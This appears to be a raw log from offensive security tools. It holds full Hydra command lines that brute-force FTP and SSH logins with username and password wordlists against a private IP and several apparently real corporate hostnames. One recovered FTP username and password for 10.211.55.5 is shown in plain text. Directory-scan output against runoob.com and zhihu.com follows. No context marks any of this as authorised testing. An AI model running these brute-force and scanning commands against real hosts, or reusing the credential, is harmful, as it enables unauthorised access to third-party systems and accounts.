# Hydra v9.0 run at 2019-10-12 21:51:45 on 10.211.55.5 ftp (hydra -L ./dic/ftp-user.txt -P ./dic/ftp-pass.txt -o ./output/out.txt ftp://10.211.55.5:21)
[21][ftp] host: 10.211.55.5   login: ftpuser   password: Zhc456654
# Hydra v9.0 run at 2019-10-12 21:52:49 on software.syncpo.com ftp (hydra -L ./dic/ftp-user.txt -P ./dic/ftp-pass.txt -o ./output/out.txt ftp://software.syncpo.com:2121)
# Hydra v9.0 run at 2019-10-12 22:11:21 on 10.211.55.5 ftp (hydra -L ./dic/ftp-user.txt -P ./dic/ftp-pass.txt -o ./output/out.txt ftp://10.211.55.5:21)
# Hydra v9.0 run at 2019-10-12 22:31:57 on exp-e01.huazhu.com ssh (hydra -L ./dic/ftp-user.txt -P ./dic/ftp-pass.txt -o ./output/out.txt ssh://exp-e01.huazhu.com:22)
# Hydra v9.0 run at 2019-10-12 22:39:09 on exp-e02.huazhu.com ssh (hydra -L ./dic/ftp-user.txt -P ./dic/ftp-pass.txt -o ./output/out.txt ssh://exp-e02.huazhu.com:22)
# Hydra v9.0 run at 2019-10-12 22:49:37 on hmeeting.huazhu.com ssh (hydra -L ./dic/ftp-user.txt -P ./dic/ftp-pass.txt -o ./output/out.txt ssh://hmeeting.huazhu.com:22)


[1m[33m
[+]Target: [36mhttps://www.runoob.com[33m
[0m
[32m[11:53:48] 200 -  255KB - /[0m
[1K[0G[1K[0G[1K[0G[1K[0G[0m
[1m[33m
[+]Target: [36mhttps://www.zhihu.com[33m
[0m
[36m[11:53:50] 302 -   93B  - /[0m  ->  //www.zhihu.com/signin?next=%2F
[36m[11:53:50] 302 -  111B  - /hot[0m  ->  https://www.zhihu.com/signin?next=%2Fhot
[36m[11:53:50] 302 -  111B  - /hot[0m  ->  https://www.zhihu.com/signin?next=%2Fhot
[1K[0G[1K[0G[1K[0G[1K[0G[32m[11:53:50] 200 -   33KB - /search[0m
[0m